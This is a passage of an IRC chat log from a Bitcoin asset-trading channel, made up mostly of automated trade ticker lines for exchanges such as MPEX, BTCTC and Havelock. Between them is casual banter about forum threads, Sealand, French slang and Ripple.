07:24:12 [MPEX] [S.MPOE] 14150 @ 0.00067824 = 9.5971 BTC [+] May 22 07:27:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.02654 = 0.1858 BTC [-] May 22 07:28:48 [MPEX] [O.USD.P119T] 37 @ 0.09043067 = 3.3459 BTC [-] May 22 07:30:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.02 = 0.06 BTC [-] May 22 07:31:01 [HAVELOCK] [ASICM] 40 @ 0.027 = 1.08 BTC [+] May 22 07:31:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02654 BTC [+] May 22 07:33:27 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [-] May 22 07:34:04 [BTCTC] [ASICMINER-PT] 1 @ 2.687 BTC [+] May 22 07:35:12 [BTCTC] [TAT.ASICMINER] 56 @ 0.02654 = 1.4862 BTC [+] May 22 07:37:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02655 BTC [+] May 22 07:37:21 [BTCTC] [ASICMINER-PT] 2 @ 2.689 = 5.378 BTC [+] May 22 07:37:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.02655 = 0.0531 BTC [+] May 22 07:44:36 [BTCTC] [TAT.ASICMINER] 226 @ 0.02655 = 6.0003 BTC [+] May 22 07:45:03 [HAVELOCK] [ASICM] 2 @ 0.0276 = 0.0552 BTC [+] May 22 07:46:13 i don't like how blockchain.info shows transactions in USD.. trying to get away from this and anyway can't search for a BTC amount on the page wtf? May 22 07:47:01 [HAVELOCK] [ASICM] 176 @ 0.0266 = 4.6816 BTC [-] May 22 07:47:45 ericmuyser: there's an advanced bar at the bottom of the page that lets you pick currency May 22 07:48:02 [HAVELOCK] [ASICM] 35 @ 0.0276 = 0.966 BTC [+] May 22 07:48:03 [HAVELOCK] [ASICM] 52 @ 0.0276 = 1.4352 BTC [+] May 22 07:48:39 [BTCTC] [ASICMINER-PT] 1 @ 2.689 BTC [+] May 22 07:48:42 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [+] May 22 07:49:56 aknap3: thank you! May 22 07:54:03 [HAVELOCK] [SDICE] 1 @ 0.236 BTC [-] May 22 07:54:04 [HAVELOCK] [SDICE] 15 @ 0.23500001 = 3.525 BTC [-] May 22 07:54:04 [HAVELOCK] [SDICE] 40 @ 0.235 = 9.4 BTC [-] May 22 07:54:06 [HAVELOCK] [SDICE] 20 @ 0.23 = 4.6 BTC [-] May 22 07:54:07 [HAVELOCK] [SDICE] 24 @ 0.2202 = 5.2848 BTC [-] May 22 07:54:58 [BTCTC] [BASIC-MINING] 1 @ 0.535 BTC [+] May 22 07:55:07 [BTCTC] [TAT.ASICMINER] 89 @ 0.02655 = 2.363 BTC [+] May 22 07:58:46 [MPEX] [S.MPOE] 3072 @ 0.00067824 = 2.0836 BTC [+] May 22 08:05:02 [HAVELOCK] [ASICM] 3 @ 0.0272 = 0.0816 BTC [-] May 22 08:07:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.02655 = 0.2655 BTC [+] May 22 08:10:01 [BTCTC] [ASICMINER-PT] 1 @ 2.693 BTC [+] May 22 08:11:49 [BTCTC] [TAT.ASICMINER] 21 @ 0.02655 = 0.5576 BTC [+] May 22 08:13:02 [HAVELOCK] [ASICM] 4 @ 0.0275 = 0.11 BTC [+] May 22 08:15:02 [HAVELOCK] [ASICM] 69 @ 0.0266 = 1.8354 BTC [-] May 22 08:17:58 [BTCTC] [TAT.ASICMINER] 27 @ 0.026105 = 0.7048 BTC [-] May 22 08:22:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.02655 BTC [+] May 22 08:25:21 [MPEX] [S.MPOE] 18194 @ 0.00067758 = 12.3279 BTC [-] May 22 08:28:41 [BTCTC] [ASICMINER-PT] 2 @ 2.685 = 5.37 BTC [-] May 22 08:28:43 [BTCTC] [ASICMINER-PT] 1 @ 2.686 BTC [+] May 22 08:28:47 [BTCTC] [ASICMINER-PT] 2 @ 2.689 = 5.378 BTC [+] May 22 08:28:49 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [+] May 22 08:28:50 [BTCTC] [ASICMINER-PT] 1 @ 2.693 BTC [+] May 22 08:28:52 [BTCTC] [ASICMINER-PT] 1 @ 2.694 BTC [+] May 22 08:30:02 [HAVELOCK] [ASICM] 14 @ 0.0274 = 0.3836 BTC [+] May 22 08:30:03 [HAVELOCK] [ASICM] 1 @ 0.0274 BTC [+] May 22 08:32:24 [BTCTC] [ASICMINER-PT] 2 @ 2.693 = 5.386 BTC [-] May 22 08:35:02 [HAVELOCK] [ASICM] 9 @ 0.0272 = 0.2448 BTC [-] May 22 08:35:03 [HAVELOCK] [ASICM] 19 @ 0.0272 = 0.5168 BTC [-] May 22 08:36:52 [BTCTC] [ASICMINER-PT] 1 @ 2.693 BTC [-] May 22 08:37:44 [BTCTC] [ASICMINER-PT] 1 @ 2.693 BTC [-] May 22 08:39:50 [BTCTC] [ASICMINER-PT] 1 @ 2.693 BTC [-] May 22 08:39:53 [BTCTC] [ASICMINER-PT] 1 @ 2.695 BTC [+] May 22 08:39:55 [BTCTC] [ASICMINER-PT] 2 @ 2.697 = 5.394 BTC [+] May 22 08:39:57 [BTCTC] [ASICMINER-PT] 9 @ 2.698 = 24.282 BTC [+] May 22 08:40:00 [BTCTC] [ASICMINER-PT] 1 @ 2.699 BTC [+] May 22 08:42:28 [BTCTC] [ASICMINER-PT] 3 @ 2.699 = 8.097 BTC [+] May 22 08:42:30 [BTCTC] [ASICMINER-PT] 7 @ 2.69999 = 18.8999 BTC [+] May 22 08:45:02 [HAVELOCK] [ASICM] 7 @ 0.02719 = 0.1903 BTC [-] May 22 08:45:09 [BTCTC] [TAT.ASICMINER] 20 @ 0.02655 = 0.531 BTC [+] May 22 08:48:33 [MPEX] [S.MPOE] 8984 @ 0.00067758 = 6.0874 BTC [-] May 22 08:48:35 [MPEX] [S.MPOE] 8002 @ 0.00067782 = 5.4239 BTC [+] May 22 08:54:06 [BTCTC] [TAT.ASICMINER] 102 @ 0.02655 = 2.7081 BTC [+] May 22 08:54:08 [BTCTC] [TAT.ASICMINER] 804 @ 0.0266 = 21.3864 BTC [+] May 22 08:55:20 [BTCTC] [ASICMINER-PT] 5 @ 2.6989 = 13.4945 BTC [-] May 22 08:55:23 [BTCTC] [ASICMINER-PT] 2 @ 2.699 = 5.398 BTC [+] May 22 08:55:25 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [+] May 22 08:55:27 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] May 22 08:56:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0268 BTC [+] May 22 08:56:49 [BTCTC] [COGNITIVE] 1 @ 0.24995 BTC [-] May 22 09:03:52 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] May 22 09:04:34 [BTCTC] [ASICMINER-PT] 3 @ 2.699 = 8.097 BTC [+] May 22 09:04:52 [MPEX] [S.MPOE] 22048 @ 0.00067782 = 14.9446 BTC [+] May 22 09:04:54 [MPEX] [S.MPOE] 602 @ 0.00067843 = 0.4084 BTC [+] May 22 09:05:07 ;;later tell mircea_popescu Good read. :D Oh man. May 22 09:05:07 The operation succeeded. May 22 09:07:03 [HAVELOCK] [ASICM] 13 @ 0.02713 = 0.3527 BTC [-] May 22 09:10:58 [BTCTC] [ASICMINER-PT] 1 @ 2.685 BTC [-] May 22 09:12:57 [BTCTC] [S.DICE-PT] 6 @ 0.0029 = 0.0174 BTC [-] May 22 09:13:28 [BTCTC] [S.DICE-PT] 394 @ 0.002802 = 1.104 BTC [-] May 22 09:15:02 [HAVELOCK] [ASICM] 43 @ 0.02719 = 1.1692 BTC [+] May 22 09:16:16 [MPEX] [S.MPOE] 20398 @ 0.00067843 = 13.8386 BTC [+] May 22 09:16:17 [MPEX] [S.MPOE] 4252 @ 0.00067926 = 2.8882 BTC [+] May 22 09:18:24 [BTCTC] [COGNITIVE] 1 @ 0.225015 BTC [-] May 22 09:19:03 [BTCTC] [ASICMINER-PT] 1 @ 2.650001 BTC [-] May 22 09:19:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.0267 = 0.2136 BTC [-] May 22 09:19:32 [BTCTC] [PAJKA.BOND] 5 @ 0.108 = 0.54 BTC [+] May 22 09:20:12 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] May 22 09:20:17 [BTCTC] [ASICMINER-PT] 5 @ 2.65 = 13.25 BTC [-] May 22 09:20:55 [BTCTC] [TAT.ASICMINER] 12 @ 0.0267 = 0.3204 BTC [-] May 22 09:21:15 [BTCTC] [ASICMINER-PT] 1 @ 2.652 BTC [+] May 22 09:21:40 [BTCTC] [S.DICE-PT] 606 @ 0.002802 = 1.698 BTC [-] May 22 09:21:52 [BTCTC] [S.DICE-PT] 20 @ 0.002701 = 0.054 BTC [-] May 22 09:21:57 [BTCTC] [S.DICE-PT] 4 @ 0.002701 = 0.0108 BTC [-] May 22 09:22:19 [BTCTC] [ASICMINER-PT] 1 @ 2.651002 BTC [-] May 22 09:22:22 [BTCTC] [S.DICE-PT] 1 @ 0.0027 BTC [-] May 22 09:22:37 [BTCTC] [S.DICE-PT] 250 @ 0.0027 = 0.675 BTC [-] May 22 09:22:41 [BTCTC] [S.DICE-PT] 6 @ 0.0027 = 0.0162 BTC [-] May 22 09:22:45 [BTCTC] [S.DICE-PT] 1000 @ 0.00264 = 2.64 BTC [-] May 22 09:23:01 [BTCTC] [RSM] 10 @ 0.009551 = 0.0955 BTC [+] May 22 09:23:03 [BTCTC] [ASICMINER-PT] 2 @ 2.62 = 5.24 BTC [-] May 22 09:23:38 [BTCTC] [ASICMINER-PT] 1 @ 2.6865 BTC [+] May 22 09:24:08 [BTCTC] [ASICMINER-PT] 8 @ 2.615 = 20.92 BTC [-] May 22 09:24:42 [BTCTC] [BASIC-MINING] 5 @ 0.54 = 2.7 BTC [+] May 22 09:24:47 [BTCTC] [RSM] 12 @ 0.009 = 0.108 BTC [-] May 22 09:24:57 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [+] May 22 09:26:03 [BTCTC] [ASICMINER-PT] 2 @ 2.61 = 5.22 BTC [-] May 22 09:27:02 [HAVELOCK] [VTX] 3 @ 0.412208 = 1.2366 BTC [-] May 22 09:27:03 [HAVELOCK] [VTX] 1 @ 0.412208 BTC [-] May 22 09:27:10 [BTCTC] [ASICMINER-PT] 1 @ 2.6105 BTC [+] May 22 09:28:17 [BTCTC] [ASICMINER-PT] 4 @ 2.6105 = 10.442 BTC [+] May 22 09:29:02 [BTCTC] [ASICMINER-PT] 1 @ 2.602 BTC [-] May 22 09:29:03 [HAVELOCK] [ASICM] 47 @ 0.02719 = 1.2779 BTC [+] May 22 09:29:04 [HAVELOCK] [ASICM] 3 @ 0.02719 = 0.0816 BTC [+] May 22 09:29:31 [BTCTC] [TAT.ASICMINER] 9 @ 0.0268 = 0.2412 BTC [+] May 22 09:30:14 [BTCTC] [ASICMINER-PT] 2 @ 2.60001 = 5.2 BTC [-] May 22 09:30:56 [BTCTC] [ASICMINER-PT] 1 @ 2.600002 BTC [-] May 22 09:32:13 [BTCTC] [ASICMINER-PT] 5 @ 2.6 = 13 BTC [-] May 22 09:32:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.0268 = 0.0804 BTC [+] May 22 09:33:44 [BTCTC] [PAJKA.BOND] 5 @ 0.1085 = 0.5425 BTC [+] May 22 09:34:20 [BTCTC] [PAJKA.BOND] 2 @ 0.1086 = 0.2172 BTC [+] May 22 09:39:01 [HAVELOCK] [ASICM] 60 @ 0.02725 = 1.635 BTC [+] May 22 09:40:01 [HAVELOCK] [HIM] 6 @ 2.1499 = 12.8994 BTC [+] May 22 09:50:13 [MPEX] [S.MPOE] 15960 @ 0.00067744 = 10.8119 BTC [-] May 22 09:50:14 [MPEX] [S.MPOE] 3956 @ 0.00067593 = 2.674 BTC [-] May 22 09:56:51 [MPEX] [S.MPOE] 2102 @ 0.00067277 = 1.4142 BTC [-] May 22 10:01:11 [BTCTC] [ASICMINER-PT] 1 @ 2.679 BTC [+] May 22 10:03:01 [HAVELOCK] [ASICM] 20 @ 0.0276 = 0.552 BTC [+] May 22 10:03:33 [BTCTC] [ASICMINER-PT] 1 @ 2.6889 BTC [+] May 22 10:04:40 [BTCTC] [BITVPS] 1 @ 0.00079 BTC [-] May 22 10:05:17 [BTCTC] [BITVPS] 9 @ 0.000799 = 0.0072 BTC [+] May 22 10:08:02 [HAVELOCK] [ASICM] 24 @ 0.0267 = 0.6408 BTC [-] May 22 10:08:03 [HAVELOCK] [ASICM] 20 @ 0.0266 = 0.532 BTC [-] May 22 10:09:46 [BTCTC] [ASICMINER-PT] 3 @ 2.689 = 8.067 BTC [+] May 22 10:10:02 [HAVELOCK] [HIM] 17 @ 2.15 = 36.55 BTC [+] May 22 10:11:43 [MPEX] [S.MPOE] 19198 @ 0.00067123 = 12.8863 BTC [-] May 22 10:12:02 [HAVELOCK] [ASICM] 18 @ 0.0276 = 0.4968 BTC [+] May 22 10:12:36 mp-pr is late https://bitcointalk.org/index.php?topic=212761.0 May 22 10:13:37 [BTCTC] [S.DICE-PT] 1 @ 0.00263 BTC [-] May 22 10:13:41 [BTCTC] [S.DICE-PT] 40 @ 0.00262 = 0.1048 BTC [-] May 22 10:14:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.0268 = 0.0804 BTC [+] May 22 10:14:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.0268 = 0.1876 BTC [+] May 22 10:16:21 [BTCTC] [TAT.ASICMINER] 33 @ 0.0268 = 0.8844 BTC [+] May 22 10:16:47 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] May 22 10:17:02 [MPEX] [S.MPOE] 252 @ 0.00067346 = 0.1697 BTC [+] May 22 10:17:08 [MPEX] [S.MPOE] 13100 @ 0.00067017 = 8.7792 BTC [-] May 22 10:23:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02688 BTC [+] May 22 10:24:02 [HAVELOCK] [ASICM] 26 @ 0.02651 = 0.6893 BTC [-] May 22 10:24:03 [HAVELOCK] [ASICM] 488 @ 0.02650009 = 12.932 BTC [-] May 22 10:24:05 [HAVELOCK] [ASICM] 500 @ 0.02650008 = 13.25 BTC [-] May 22 10:24:06 [HAVELOCK] [ASICM] 10 @ 0.0264 = 0.264 BTC [-] May 22 10:25:30 [BTCTC] [BITVPS] 3 @ 0.000799 = 0.0024 BTC [+] May 22 10:28:05 [BTCTC] [ASICMINER-PT] 14 @ 2.63 = 36.82 BTC [+] May 22 10:32:15 [BTCTC] [TAT.ASICMINER] 36 @ 0.02688 = 0.9677 BTC [+] May 22 10:32:27 [BTCTC] [ASICMINER-PT] 2 @ 2.63 = 5.26 BTC [+] May 22 10:33:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.0268 = 0.134 BTC [-] May 22 10:33:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.026 = 0.156 BTC [-] May 22 10:34:01 [BTCTC] [TAT.ASICMINER] 12 @ 0.02564 = 0.3077 BTC [-] May 22 10:38:30 [MPEX] [S.MPOE] 19348 @ 0.00067005 = 12.9641 BTC [-] May 22 10:39:02 [MPEX] [S.MPOE] 2280 @ 0.00067385 = 1.5364 BTC [+] May 22 10:39:04 [MPEX] [S.MPOE] 1498 @ 0.00067926 = 1.0175 BTC [+] May 22 10:43:10 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [+] May 22 10:43:19 [MPEX] [S.MPOE] 1613 @ 0.00067973 = 1.0964 BTC [+] May 22 10:43:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.02688 = 0.0538 BTC [+] May 22 10:50:27 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [+] May 22 10:51:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02688 BTC [+] May 22 10:53:04 [BTCTC] [TAT.ASICMINER] 11 @ 0.0257 = 0.2827 BTC [-] May 22 10:53:34 [BTCTC] [TAT.ASICMINER] 13 @ 0.02565 = 0.3335 BTC [-] May 22 10:54:21 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] May 22 10:54:56 [BTCTC] [BITVPS] 1 @ 0.000799 BTC [+] May 22 10:56:02 [HAVELOCK] [ASICM] 25 @ 0.027 = 0.675 BTC [+] May 22 10:56:15 [BTCTC] [S.MPOE-PT] 1 @ 0.000666 BTC [+] May 22 10:59:02 [HAVELOCK] [ASICM] 6 @ 0.0273 = 0.1638 BTC [+] May 22 11:00:02 [HAVELOCK] [ASICM] 25 @ 0.0264 = 0.66 BTC [-] May 22 11:00:02 [HAVELOCK] [ASICM] 38 @ 0.0263726 = 1.0022 BTC [-] May 22 11:00:03 [HAVELOCK] [ASICM] 19 @ 0.0262 = 0.4978 BTC [-] May 22 11:00:05 [HAVELOCK] [ASICM] 1218 @ 0.026 = 31.668 BTC [-] May 22 11:03:14 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [-] May 22 11:03:33 [BTCTC] [ASICMINER-PT] 1 @ 2.606 BTC [-] May 22 11:03:37 [BTCTC] [ASICMINER-PT] 3 @ 2.603 = 7.809 BTC [-] May 22 11:04:10 [BTCTC] [TAT.ASICMINER] 11 @ 0.0268 = 0.2948 BTC [+] May 22 11:15:32 [BTCTC] [ASICMINER-PT] 1 @ 2.6005 BTC [-] May 22 11:15:36 [BTCTC] [ASICMINER-PT] 1 @ 2.6002 BTC [-] May 22 11:15:42 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] May 22 11:15:48 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] May 22 11:17:52 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 22 11:17:58 [BTCTC] [ASICMINER-PT] 1 @ 2.5821 BTC [-] May 22 11:18:02 [BTCTC] [ASICMINER-PT] 2 @ 2.582 = 5.164 BTC [-] May 22 11:18:16 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] May 22 11:18:23 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] May 22 11:18:55 [BTCTC] [ASICMINER-PT] 6 @ 2.58 = 15.48 BTC [-] May 22 11:24:01 [BTCTC] [TAT.ASICMINER] 15 @ 0.02681 = 0.4022 BTC [+] May 22 11:27:02 [HAVELOCK] [ASICM] 108 @ 0.0269 = 2.9052 BTC [+] May 22 11:27:03 [HAVELOCK] [ASICM] 4 @ 0.027 = 0.108 BTC [+] May 22 11:28:52 [MPEX] [S.MPOE] 2837 @ 0.0006786 = 1.9252 BTC [-] May 22 11:29:11 [BTCTC] [ASICMINER-PT] 1 @ 2.570501 BTC [-] May 22 11:29:15 [BTCTC] [ASICMINER-PT] 1 @ 2.5705 BTC [-] May 22 11:29:25 [BTCTC] [ASICMINER-PT] 9 @ 2.57 = 23.13 BTC [-] May 22 11:29:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02688 BTC [+] May 22 11:33:23 [BTCTC] [ASICMINER-PT] 1 @ 2.599899 BTC [+] May 22 11:34:16 [BTCTC] [ASICMINER-PT] 10 @ 2.61 = 26.1 BTC [+] May 22 11:34:19 [BTCTC] [ASICMINER-PT] 1 @ 2.659 BTC [+] May 22 11:34:24 [BTCTC] [ASICMINER-PT] 1 @ 2.665 BTC [+] May 22 11:34:26 [BTCTC] [ASICMINER-PT] 1 @ 2.666 BTC [+] May 22 11:34:36 [BTCTC] [ASICMINER-PT] 1 @ 2.669 BTC [+] May 22 11:34:37 [BTCTC] [TAT.ASICMINER] 22 @ 0.02688 = 0.5914 BTC [+] May 22 11:34:40 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [+] May 22 11:34:43 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [+] May 22 11:35:49 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [+] May 22 11:36:53 [BTCTC] [ASICMINER-PT] 1 @ 2.701 BTC [+] May 22 11:37:41 [BTCTC] [ASICMINER-PT] 2 @ 2.707 = 5.414 BTC [+] May 22 11:38:05 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] May 22 11:40:53 [BTCTC] [ASICMINER-PT] 1 @ 2.708999 BTC [+] May 22 11:40:55 [BTCTC] [ASICMINER-PT] 1 @ 2.709 BTC [+] May 22 11:40:58 [BTCTC] [ASICMINER-PT] 2 @ 2.71 = 5.42 BTC [+] May 22 11:41:14 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] May 22 11:41:42 [BTCTC] [ASICMINER-PT] 7 @ 2.7 = 18.9 BTC [-] May 22 11:42:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.02688 = 0.1075 BTC [+] May 22 11:44:53 [BTCTC] [ASICMINER-PT] 2 @ 2.739 = 5.478 BTC [+] May 22 11:46:42 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] May 22 11:47:28 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] May 22 11:47:37 [BTCTC] [ASICMINER-PT] 4 @ 2.7 = 10.8 BTC [-] May 22 11:48:40 [BTCTC] [TAT.ASICMINER] 23 @ 0.02688 = 0.6182 BTC [+] May 22 11:49:30 [BTCTC] [ASICMINER-PT] 1 @ 2.742999 BTC [+] May 22 11:49:44 [BTCTC] [TAT.ASICMINER] 38 @ 0.02689 = 1.0218 BTC [+] May 22 11:49:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.02689 = 0.2689 BTC [+] May 22 11:50:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.02689 = 0.1345 BTC [+] May 22 11:50:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02689 = 0.0807 BTC [+] May 22 11:51:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.02689 BTC [+] May 22 11:51:08 qxzn hey there. May 22 11:51:21 [BTCTC] [S.DICE-PT] 1 @ 0.00262 BTC [-] May 22 11:51:56 howdy May 22 11:52:09 ;;ticker May 22 11:52:10 BTCUSD ticker | Best bid: 122.21001, Best ask: 122.88979, Bid-ask spread: 0.67978, Last trade: 122.21002, 24 hour volume: 15560.04028099, 24 hour low: 121.12000, 24 hour high: 123.49000, 24 hour vwap: 122.42249 May 22 11:52:27 nothin' much, everyone chillin' May 22 11:52:36 [BTCTC] [TAT.ASICMINER] 23 @ 0.02689 = 0.6185 BTC [+] May 22 11:52:49 [BTCTC] [TAT.ASICMINER] 30 @ 0.026899 = 0.807 BTC [+] May 22 11:53:18 [BTCTC] [TAT.ASICMINER] 100 @ 0.02699 = 2.699 BTC [+] May 22 11:54:21 [BTCTC] [TAT.ASICMINER] 23 @ 0.0289 = 0.6647 BTC [+] May 22 11:55:31 [BTCTC] [ASICMINER-PT] 1 @ 2.743 BTC [+] May 22 11:56:45 Ugh, there is nothing like a simple fix that you overlook May 22 11:56:57 [BTCTC] [TAT.ASICMINER] 18 @ 0.029 = 0.522 BTC [+] May 22 11:59:08 [BTCTC] [ASICMINER-PT] 1 @ 2.743 BTC [+] May 22 12:01:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.027001 = 0.54 BTC [-] May 22 12:02:27 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] May 22 12:02:33 [BTCTC] [ASICMINER-PT] 1 @ 2.701 BTC [-] May 22 12:03:49 [BTCTC] [ASICMINER-PT] 2 @ 2.700003 = 5.4 BTC [-] May 22 12:04:50 [BTCTC] [ASICMINER-PT] 5 @ 2.700002 = 13.5 BTC [-] May 22 12:06:02 [HAVELOCK] [VTX] 2 @ 0.4116 = 0.8232 BTC [-] May 22 12:06:13 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] May 22 12:06:16 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] May 22 12:06:50 [BTCTC] [ASICMINER-PT] 1 @ 2.610001 BTC [-] May 22 12:07:31 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [-] May 22 12:07:35 [BTCTC] [ASICMINER-PT] 5 @ 2.61 = 13.05 BTC [-] May 22 12:10:01 [HAVELOCK] [ASICM] 14 @ 0.02699999 = 0.378 BTC [-] May 22 12:12:02 [HAVELOCK] [ASICM] 4 @ 0.02699999 = 0.108 BTC [-] May 22 12:18:40 [BTCTC] [PAJKA.BOND] 2 @ 0.108988 = 0.218 BTC [+] May 22 12:19:31 lulzy https://bitcointalk.org/index.php?topic=212761.msg2232314#msg2232314 May 22 12:19:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.028979 = 0.0869 BTC [+] May 22 12:20:26 hahaha it got removed before i could quote it May 22 12:20:59 OP REPLIED TO ME "someone don't know the difference between turnover/revenue and share price" May 22 12:21:16 damn capsl May 22 12:23:01 [HAVELOCK] [ASICM] 31 @ 0.0266 = 0.8246 BTC [-] May 22 12:25:49 [BTCTC] [ASICMINER-PT] 1 @ 2.738895 BTC [+] May 22 12:27:37 [BTCTC] [ASICMINER-PT] 1 @ 2.738896 BTC [+] May 22 12:29:52 lol at that thread. May 22 12:29:57 da fuck is wrong with these people. May 22 12:30:36 [BTCTC] [ASICMINER-PT] 1 @ 2.738895 BTC [-] May 22 12:30:39 well - they're asking him valid questions? May 22 12:31:01 not the other people in that thread. May 22 12:31:18 the countless idiots who keep going "herp, i am going to start a new country" May 22 12:31:29 like the original poster. there's about one a day since about march. May 22 12:31:32 LOL May 22 12:31:50 no but seriously, he's done it in civ AND in settlers IV May 22 12:31:53 how hard could it be ? May 22 12:32:11 just needs to find the right button to cluck at. May 22 12:33:40 hahahahaha May 22 12:37:49 what would be fun would be someone starting a clinic based on his theme hospital experience May 22 12:38:08 0.o May 22 12:38:20 dude. a psych hospital staffed by ex psych patiens. May 22 12:38:35 this could be an excellent novel. great premise. May 22 12:38:39 need a boris vian to execute it. May 22 12:38:52 but that's actually what's happening already May 22 12:39:01 which is why it's so good. May 22 12:39:07 why would anyone with a sane mind work in a psychiatric hospital May 22 12:39:24 i have done a number of psych undergrads and i can attest none were sane. May 22 12:39:30 mircea_popescu: im sure you read about that kid who grew up on sealand, got kidnapped by a gang of german/dutch thugs and held at gunpoint May 22 12:39:40 this could of course simply be caused by them being femals. May 22 12:39:58 fiat500 the guy's son neh ? May 22 12:40:10 https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-frc1/481751_10151706601672498_795405961_n.jpg May 22 12:40:23 yes lol May 22 12:40:26 http://citizensrequired.picture-ltd.com/citizensrequired/mossy/sealand/sealand.shtml May 22 12:40:30 a poil leul May 22 12:40:39 he did an AMA on reddit few months back May 22 12:40:48 :-) May 22 12:40:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0278 BTC [-] May 22 12:41:24 LOL@ those remotes May 22 12:41:43 ma meuf a moi, elle me port'en voitureeee May 22 12:41:51 LOL May 22 12:42:01 it's actually understandable May 22 12:42:20 ta meuf c'est ton chauffeur quoi May 22 12:42:50 oue May 22 12:43:35 of course it may come as a shock to the prissy english types May 22 12:43:52 that the way to order a girl in the nude in french refers to her body hair. May 22 12:44:04 it's actually for guys too May 22 12:44:15 >_> May 22 12:44:48 please refer to this masterpiece of french culture for more information regarding this delicious expression : May 22 12:44:49 http://www.youtube.com/watch?v=OPMVpeckk5A May 22 12:48:01 ah, i've missed hanging out in assets May 22 12:49:02 [HAVELOCK] [ASICM] 30 @ 0.0266 = 0.798 BTC [-] May 22 12:50:09 hi TradeFortress May 22 12:50:19 hi mjr_! May 22 12:52:16 [BTCTC] [S.DICE-PT] 8 @ 0.00262 = 0.021 BTC [-] May 22 12:52:59 [BTCTC] [ASICMINER-PT] 1 @ 2.620101 BTC [-] May 22 12:53:05 [BTCTC] [ASICMINER-PT] 1 @ 2.6201 BTC [-] May 22 12:53:11 [BTCTC] [ASICMINER-PT] 1 @ 2.620001 BTC [-] May 22 12:53:17 [BTCTC] [ASICMINER-PT] 5 @ 2.62 = 13.1 BTC [-] May 22 12:53:21 [BTCTC] [ASICMINER-PT] 1 @ 2.600002 BTC [-] May 22 12:53:26 [BTCTC] [ASICMINER-PT] 5 @ 2.600001 = 13 BTC [-] May 22 12:53:37 [BTCTC] [ASICMINER-PT] 5 @ 2.6 = 13 BTC [-] May 22 12:53:38 There's a tendency for every Ripple related thread to turn into discussions about Ripple. It's certainly not very productive. May 22 12:53:47 LOL ^^^ THIS May 22 12:53:47 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [-] May 22 12:54:06 mjr_, ESPECIALLY when the topic is called " May 22 12:54:07 Re: Ripple trying to take over the Bitcoin Discussion thread " May 22 12:54:25 yes, i have basically put ripple to bed in my mind May 22 12:54:42 i'm done thinking of it May 22 12:54:47 Ripple threads even invaded the donators section May 22 12:54:58 and they were at the conference May 22 12:55:10 i was like, why isn't litecoin here? or namecoin May 22 12:56:08 there are people actively working on litecoin and namecoin? May 22 12:56:10 :P May 22 13:00:44 [MPEX] [S.MPOE] 16050 @ 0.00067959 = 10.9074 BTC [+] May 22 13:00:53 .msg nickserv help register May 22 13:01:08 :/ May 22 13:02:14 [BTCTC] [ASICMINER-PT] 1 @ 2.699898 BTC [+] May 22 13:03:02 [HAVELOCK] [ASICM] 81 @ 0.0266 = 2.1546 BTC [-] May 22 13:03:50 [BTCTC] [ASICMINER-PT] 3 @ 2.699898 = 8.0997 BTC [+] May 22 13:04:07 [MPEX] [S.MPOE] 10907 @ 0.00067959 = 7.4123 BTC [+] May 22 13:04:15 [BTCTC] [ASICMINER-PT] 1 @ 2.699898 BTC [+] May 22 13:04:41 [BTCTC] [ASICMINER-PT] 2 @ 2.6 = 5.2 BTC [-] May 22 13:05:01 [HAVELOCK] [ASICM] 10 @ 0.0266 = 0.266 BTC [-] May 22 13:06:04 TradeFortress: i think there are people mining them 